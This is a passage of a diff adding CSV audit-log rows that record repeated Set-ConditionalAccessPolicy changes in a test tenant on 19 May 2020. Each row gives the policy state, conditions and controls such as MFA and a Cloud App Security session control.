+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:42:17 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:41:57Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:41:57 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:41:04Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:41:03 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:40:02Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:40:01 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:40:38Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:40:38 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:41:03Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:41:03 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:40:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:40:35 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:40:39Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:40:39 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:40:00Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:40:00 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:40:36Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:40:35 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:38:06Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:38:05 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:53:23Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:53:23 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:33:15Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:33:14 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:34:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:34:12 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:33:47Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:33:47 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:31:42.3802191Z""
+  }
+]"
+2020-05-19T13:32:07Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:32:06 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:32:11Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:32:11 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:32:33Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:32:33 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:31:42.3802191Z""
+  }
+]"
+2020-05-19T13:32:28Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:32:27 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:31:16Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:31:15 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:32:27Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:32:27 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:31:42.3802191Z""
+  }
+]"
+2020-05-19T13:30:12Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:28:43.7456101Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:30:12 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:58:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:12 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:58:37Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:58:36 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
